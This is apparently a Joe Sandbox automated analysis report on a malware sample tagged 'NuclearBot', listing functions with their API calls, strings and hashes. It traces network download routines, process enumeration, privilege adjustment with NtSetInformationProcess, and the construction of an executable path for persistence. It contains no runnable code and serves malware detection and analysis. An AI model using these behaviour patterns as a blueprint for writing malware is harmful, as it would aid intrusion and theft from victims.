Opcode ID: e12e1df25e00b270c98f9d2c50c0c62431dded8424c62ee45222e96d30c3c4bf
Instruction ID: 803b6d542d4305a23921be73faa9853fba98584341c73d527605738c8f1b9c0a
Opcode Fuzzy Hash: e12e1df25e00b270c98f9d2c50c0c62431dded8424c62ee45222e96d30c3c4bf
Instruction Fuzzy Hash: 70219622649782E1EB708B10E4447AB67A4FF84795F401139DEED83A95DF3CD105C700

Function 00007FF68A195CD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF68A195D1B

Strings

csm, xrefs: 00007FF68A195CDF

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID: csm
API String ID: 3192549508-1018135373
Opcode ID: a9bbc5783572fe79802af9e5177148177d622e0359cb5925f542bea3ea13f282
Instruction ID: 8227fd8e9d50c8d1652d6a4e87a3b8046e74fe0d3935afcaa22d08de0223b127
Opcode Fuzzy Hash: a9bbc5783572fe79802af9e5177148177d622e0359cb5925f542bea3ea13f282
Instruction Fuzzy Hash: BFE02B21F06003D1EB586F3585C90782AE1FF94720FE414B9CA4DE2381DE1CE9CAC700

Function 00007FF68A188878 Relevance: 3.1, APIs: 2, Instructions: 79threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68A18731C: InternetOpenW.WININET ref: 00007FF68A187373
Part of subcall function 00007FF68A18731C: InternetOpenUrlW.WININET ref: 00007FF68A1873A7
Part of subcall function 00007FF68A18731C: InternetOpenUrlW.WININET ref: 00007FF68A1873D6
Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A1873E7

Part of subcall function 00007FF68A18731C: Sleep.KERNEL32 ref: 00007FF68A187359
Part of subcall function 00007FF68A18731C: HttpQueryInfoA.WININET ref: 00007FF68A187447
Part of subcall function 00007FF68A18731C: GetProcessHeap.KERNEL32 ref: 00007FF68A187451
Part of subcall function 00007FF68A18731C: HeapAlloc.KERNEL32 ref: 00007FF68A187462
Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A187473
Part of subcall function 00007FF68A18731C: InternetReadFile.WININET ref: 00007FF68A1874AA
Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A1874BB
Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A1874C4

Part of subcall function 00007FF68A185AC0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68A185B05
Part of subcall function 00007FF68A185AC0: Process32FirstW.KERNEL32 ref: 00007FF68A185B2A
Part of subcall function 00007FF68A185AC0: CloseHandle.KERNEL32 ref: 00007FF68A185B87
Part of subcall function 00007FF68A185AC0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF68A1872C1

CreateThread.KERNEL32 ref: 00007FF68A188998
CreateThread.KERNEL32 ref: 00007FF68A1889B5

Part of subcall function 00007FF68A1883E8: RtlAdjustPrivilege.NTDLL ref: 00007FF68A188443
Part of subcall function 00007FF68A1883E8: NtSetInformationProcess.NTDLL ref: 00007FF68A18845D
Part of subcall function 00007FF68A1883E8: Sleep.KERNEL32 ref: 00007FF68A1885F6
Part of subcall function 00007FF68A1883E8: Sleep.KERNEL32 ref: 00007FF68A188673

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Internet$CloseHandle$CreateOpenSleep$HeapProcessThread$AdjustAllocFileFirstHttpInfoInformationIos_base_dtorPrivilegeProcess32QueryReadSnapshotToolhelp32std::ios_base::_
String ID:
API String ID: 1906031915-0
Opcode ID: 7f176978def952677b8ee24faf4b3ff694f8d3dd7d4e1fdb9a5eaa081bf95096
Instruction ID: f64600aa4af33cf808bf61e98601f0c7fb5e5648d99d96f5632f77c77f35de2e
Opcode Fuzzy Hash: 7f176978def952677b8ee24faf4b3ff694f8d3dd7d4e1fdb9a5eaa081bf95096
Instruction Fuzzy Hash: 60313B33A1AB12E5F7109FA0E8406DD3B75BF44768F54167AED9CA2EA4DF38914AC300

Function 00007FF68A196FB8 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac999b8a5df659a7e9270163a343038d070dede47a62065c90b7984cfe182448
Instruction ID: 477242c37fd9ffc75ee836b7f8c7b5c386372fb87e3ff565c300f2cb2c682fb2
Opcode Fuzzy Hash: ac999b8a5df659a7e9270163a343038d070dede47a62065c90b7984cfe182448
Instruction Fuzzy Hash:

Function 00007FF68A18731C Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 146networkmemorysleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF68A187359
InternetOpenW.WININET ref: 00007FF68A187373
InternetOpenUrlW.WININET ref: 00007FF68A1873A7
InternetOpenUrlW.WININET ref: 00007FF68A1873D6
InternetCloseHandle.WININET ref: 00007FF68A1873E7
HttpQueryInfoA.WININET ref: 00007FF68A187447
GetProcessHeap.KERNEL32 ref: 00007FF68A187451
HeapAlloc.KERNEL32 ref: 00007FF68A187462
InternetCloseHandle.WININET ref: 00007FF68A187473
InternetReadFile.WININET ref: 00007FF68A1874AA
InternetCloseHandle.WININET ref: 00007FF68A1874BB
InternetCloseHandle.WININET ref: 00007FF68A1874C4

Strings

NuclearBot, xrefs: 00007FF68A18735F

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Internet$CloseHandle$Open$Heap$AllocFileHttpInfoProcessQueryReadSleep
String ID: NuclearBot
API String ID: 210480886-821128150
Opcode ID: 1e8c98ae91c802a57b132e6c08420ea60fbe6bff182261198396aa96d2c24d7c
Instruction ID: fc649346b33e8dde618779d6561e57e70465205d2b954cf01f2ba1cea3864438
Opcode Fuzzy Hash: 1e8c98ae91c802a57b132e6c08420ea60fbe6bff182261198396aa96d2c24d7c
Instruction Fuzzy Hash: 7B51503561A642D6EB209F22E89462A7B61FF44B88F001079DEDE87B55DF3CE458C744

Function 00007FF68A19AEA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A19AEC1

Part of subcall function 00007FF68A19CAD4: _lock.LIBCMT ref: 00007FF68A19CAE6

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A19AEE6
messages.LIBCPMT ref: 00007FF68A19AF69
std::bad_exception::bad_exception.LIBCMT ref: 00007FF68A19AF80
_CxxThrowException.LIBCMT ref: 00007FF68A19AF91
std::_Facet_Register.LIBCPMT ref: 00007FF68A19AFAF

Strings

unknown error, xrefs: 00007FF68A19AEA0
bad cast, xrefs: 00007FF68A19AF74

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast$unknown error
API String ID: 620047600-2424861499
Opcode ID: 32bfaffed2e4ff8b87b6feef9a6b935824c54c53ba7fb93c474e9d09f019db24
Instruction ID: ed133ab880c4b7378a3d725e73dff20c321d691bbd74be738c92af07b03c0bc4
Opcode Fuzzy Hash: 32bfaffed2e4ff8b87b6feef9a6b935824c54c53ba7fb93c474e9d09f019db24
Instruction Fuzzy Hash: 70319361A0AA42E1EA10DB15E6400BD6B60FF54BA4F9C02B9DEDD873E5DE3CE847C700

Function 00007FF68A1812FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

_CxxThrowException.LIBCMT ref: 00007FF68A181345
_CxxThrowException.LIBCMT ref: 00007FF68A18136D
_CxxThrowException.LIBCMT ref: 00007FF68A18138A
_CxxThrowException.LIBCMT ref: 00007FF68A1813A7
std::exception::exception.LIBCMT ref: 00007FF68A1813C0

Strings

ios_base::failbit set, xrefs: 00007FF68A181373
ios_base::eofbit set, xrefs: 00007FF68A181390
ios_base::badbit set, xrefs: 00007FF68A181352

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: ExceptionThrow$std::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589471213-1866435925
Opcode ID: 54f4e4a4734dc6e0b1e3008dbfca8e4a4f274af2efa47cb4c3842ccca1c8752e
Instruction ID: 06b6b9e78f2d9f7933aecc040db5184ed33169d557478139bd99afd25b3f7690
Opcode Fuzzy Hash: 54f4e4a4734dc6e0b1e3008dbfca8e4a4f274af2efa47cb4c3842ccca1c8752e
Instruction Fuzzy Hash: FF21A026F1AA46F5EB00DB20E9814EC2B25BF50744F944179DE8D96A69EF3CF599C300

Function 00007FF68A187838 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68A187718: GetWindowsDirectoryA.KERNEL32 ref: 00007FF68A187763
Part of subcall function 00007FF68A187718: GetVolumeInformationA.KERNEL32 ref: 00007FF68A1877AB
Part of subcall function 00007FF68A187718: wsprintfA.USER32 ref: 00007FF68A187811

SHGetFolderPathA.SHELL32 ref: 00007FF68A187880
lstrcatA.KERNEL32 ref: 00007FF68A187890
lstrcatA.KERNEL32 ref: 00007FF68A18789E
CreateDirectoryA.KERNEL32 ref: 00007FF68A1878A9
lstrcatA.KERNEL32 ref: 00007FF68A1878B9
lstrcatA.KERNEL32 ref: 00007FF68A1878C7
lstrcatA.KERNEL32 ref: 00007FF68A1878D7

Strings

.exe, xrefs: 00007FF68A1878CD

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
String ID: .exe
API String ID: 943468954-4119554291
Opcode ID: ce45eb69d650ccc5491f935c5f71eb0aad31f71449c4adc5bf6abdbe12f3ede6
Instruction ID: 2785558cee84e71c0a9b445fc18cfd85b1d130a9b45d6ee93bfdddbe17fa430d
Opcode Fuzzy Hash: ce45eb69d650ccc5491f935c5f71eb0aad31f71449c4adc5bf6abdbe12f3ede6
Instruction Fuzzy Hash: AF11B221A19A57E2EB449B11F85047D7B62FF88B84F846075DC8F82628DE3CE04DC700

Function 00007FF68A19AFD0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A19AFF1

Part of subcall function 00007FF68A19CAD4: _lock.LIBCMT ref: 00007FF68A19CAE6

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A19B016
ctype.LIBCPMT ref: 00007FF68A19B099
std::bad_exception::bad_exception.LIBCMT ref: 00007FF68A19B0B0
_CxxThrowException.LIBCMT ref: 00007FF68A19B0C1
std::_Facet_Register.LIBCPMT ref: 00007FF68A19B0DF

Strings

bad cast, xrefs: 00007FF68A19B0A4

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
String ID: bad cast
API String ID: 3320480354-3145022300
Opcode ID: 77704c3e0316a4ceb633819b756109acd5e019c7a84d8bc16fbfd98e5dbfb666
Instruction ID: cb4d4afdbc9652f966e8c680c6085e2a1535fab71d7fdcf9cce25e95d0261593
Opcode Fuzzy Hash: 77704c3e0316a4ceb633819b756109acd5e019c7a84d8bc16fbfd98e5dbfb666
Instruction Fuzzy Hash: 25319325B0EA42E1EA10DB15E6401B92B61FF50BA4F9C42B9DEED837E5DE3CE442C700

Function 00007FF68A19EA47 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 00007FF68A19EA72
RaiseException.KERNEL32 ref: 00007FF68A19EA9B
__DestructExceptionObject.LIBCMT ref: 00007FF68A19EAFC
_getptd.LIBCMT ref: 00007FF68A19EA4F

Part of subcall function 00007FF68A191F68: _getptd_noexit.LIBCMT ref: 00007FF68A191F6E

_getptd.LIBCMT ref: 00007FF68A19EB01
_getptd.LIBCMT ref: 00007FF68A19EB0D

Strings

csm, xrefs: 00007FF68A19EACF

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Exception_getptd$DestructObject$Raise_getptd_noexit
String ID: csm
API String ID: 2851507484-1018135373
Opcode ID: bf4e60e87c46d2a31e1a79f5fbb96882cb91291f71038f4354b5af9e6f1100dd
Instruction ID: a5fee910339d82880c2f454ce5b1bbe8a4f1c7b29415a54de10a08f10cf7209f
Opcode Fuzzy Hash: bf4e60e87c46d2a31e1a79f5fbb96882cb91291f71038f4354b5af9e6f1100dd
Instruction Fuzzy Hash: 18217A36609646C2D6309B12E2402AEBB60FF85BA5F884179DE9E43795CF3DE486CB00

Function 00007FF68A192C6C Relevance: 12.2, APIs: 8, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 00007FF68A192C95

Part of subcall function 00007FF68A18F740: malloc.LIBCMT ref: 00007FF68A18F76B
Part of subcall function 00007FF68A18F740: Sleep.KERNEL32(?,?,?,00007FF68A193E30,?,?,?,00007FF68A193D2F,?,?,00000000,00007FF68A19206E), ref: 00007FF68A18F77E

free.LIBCMT ref: 00007FF68A192D96
free.LIBCMT ref: 00007FF68A192DB2

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: free$Sleep_malloc_crtmalloc
String ID:
API String ID: 2523592665-0
Opcode ID: 481a3ecdffaf1a92365bf5561cbd4cba3cf272347ecd33dfdeae438f1c6dd69c
Instruction ID: 4c84f5720e421e1ebd484c55760a04939b4e7188c9590fbdf5bb1d47fa8fedba
Opcode Fuzzy Hash: 481a3ecdffaf1a92365bf5561cbd4cba3cf272347ecd33dfdeae438f1c6dd69c
Instruction Fuzzy Hash: 67618226B06B01E2EB50DB16EA802697BA4FF84794F484179DECD87B51DF3CE565C300

Function 00007FF68A19A6C0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68A19A6EB
_errno.LIBCMT ref: 00007FF68A19A6E0

Part of subcall function 00007FF68A190908: _getptd_noexit.LIBCMT ref: 00007FF68A19090C

_errno.LIBCMT ref: 00007FF68A19A78E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF68A19A799

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: b91b70b1a711be88867884abfe0c0040d6edeeba6b26403908f8f87642237241
Instruction ID: 0b08ff44fb83f90d232640f2e92375ef3bf62d3aceab4e29b4dee8c0cff34bda
Opcode Fuzzy Hash: b91b70b1a711be88867884abfe0c0040d6edeeba6b26403908f8f87642237241
Instruction Fuzzy Hash: 0E410662E1A2A2D1EB689B1192411B96AA0FF40B95FCC417DEEDC876C4DF2CE55BC300

Function 00007FF68A18D0F0 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68A18D116
_errno.LIBCMT ref: 00007FF68A18D10B

Part of subcall function 00007FF68A190908: _getptd_noexit.LIBCMT ref: 00007FF68A19090C

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00007FF68A18D195
_errno.LIBCMT ref: 00007FF68A18D1A6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF68A18D1B1

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: 4c6b3eea06fa5b0576fdbd463b242732bc8057be197bfdb22180e49594bcd200
Instruction ID: c611ca2d067ab099efc4a6d05e9a0da7bd7d5779e33178bff8ab968f4878887e
Opcode Fuzzy Hash: 4c6b3eea06fa5b0576fdbd463b242732bc8057be197bfdb22180e49594bcd200
Instruction Fuzzy Hash: 61411572E5A3A2D5EB64AB1191501B93BA1FF50BA0F944179EFDC87AC4DE2CE951C300

Function 00007FF68A18B1A8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A18B1DD

Part of subcall function 00007FF68A19CAD4: _lock.LIBCMT ref: 00007FF68A19CAE6

Part of subcall function 00007FF68A1843D4: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A1843F9

codecvt.LIBCPMT ref: 00007FF68A18B24B

Part of subcall function 00007FF68A1844F8: codecvt.LIBCPMT ref: 00007FF68A18457F
Part of subcall function 00007FF68A1844F8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 00007FF68A184596

std::bad_exception::bad_exception.LIBCMT ref: 00007FF68A18B262

Part of subcall function 00007FF68A18BB64: std::exception::exception.LIBCMT ref: 00007FF68A18BB76

_CxxThrowException.LIBCMT ref: 00007FF68A18B273

Part of subcall function 00007FF68A190FE0: RtlPcToFileHeader.NTDLL ref: 00007FF68A19106F
Part of subcall function 00007FF68A190FE0: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68A19AE65), ref: 00007FF68A1910AE

std::_Facet_Register.LIBCPMT ref: 00007FF68A18B291

Strings

bad cast, xrefs: 00007FF68A18B256

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: std::_$ExceptionLockitLockit::_codecvt$Facet_FileHeaderLocinfoLocinfo::~_RaiseRegisterThrow_lockstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 2307844773-3145022300
Opcode ID: 5f85852e3b58f89828f0a6f287818b54055ca26fdad3850610115cc3bd79f0be
Instruction ID: 170aea132adc55ef9607160901a6c4f244092363b39ad018a60b8d7bfc7c920a
Opcode Fuzzy Hash: 5f85852e3b58f89828f0a6f287818b54055ca26fdad3850610115cc3bd79f0be
Instruction Fuzzy Hash: 71317322B5EB46E1EA10DB11D4505AC6B65FF58BA0B4502B9DEED877E5DF3CE802C300

Function 00007FF68A18A800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A18A835

Part of subcall function 00007FF68A19CAD4: _lock.LIBCMT ref: 00007FF68A19CAE6

Part of subcall function 00007FF68A1843D4: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68A1843F9

ctype.LIBCPMT ref: 00007FF68A18A8A3

Part of subcall function 00007FF68A18494C: ctype.LIBCPMT ref: 00007FF68A1849DE
Part of subcall function 00007FF68A18494C: std::_Locinfo::~_Locinfo.LIBCPMT ref: 00007FF68A1849F5

std::bad_exception::bad_exception.LIBCMT ref: 00007FF68A18A8BA

Part of subcall function 00007FF68A18BB64: std::exception::exception.LIBCMT ref: 00007FF68A18BB76

_CxxThrowException.LIBCMT ref: 00007FF68A18A8CB

Part of subcall function 00007FF68A190FE0: RtlPcToFileHeader.NTDLL ref: 00007FF68A19106F
Part of subcall function 00007FF68A190FE0: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68A19AE65), ref: 00007FF68A1910AE

std::_Facet_Register.LIBCPMT ref: 00007FF68A18A8E9

Strings

bad cast, xrefs: 00007FF68A18A8AE

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: std::_$ExceptionLockitLockit::_ctype$Facet_FileHeaderLocinfoLocinfo::~_RaiseRegisterThrow_lockstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 2222302978-3145022300
Opcode ID: d56bbb4b07fd36a7a51dafdb15800d8d917544a03caeee3cb93089a16e5dfef7
Instruction ID: 3c013df94aa11efa7da10305ee2b51782628be2c4192e0432047c91dbfa9699a
Opcode Fuzzy Hash: d56bbb4b07fd36a7a51dafdb15800d8d917544a03caeee3cb93089a16e5dfef7
Instruction Fuzzy Hash: 93317622B5AB52E2EA10DB11D4541786B61FF59BA0B4503B9DEED877D5DF3CD802C300

Function 00007FF68A19EB44 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF68A19EB65
_getptd.LIBCMT ref: 00007FF68A19EB73
_getptd.LIBCMT ref: 00007FF68A19EB85

Strings

MOC, xrefs: 00007FF68A19EB53
csm, xrefs: 00007FF68A19EB5B
RCC, xrefs: 00007FF68A19EB4B

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
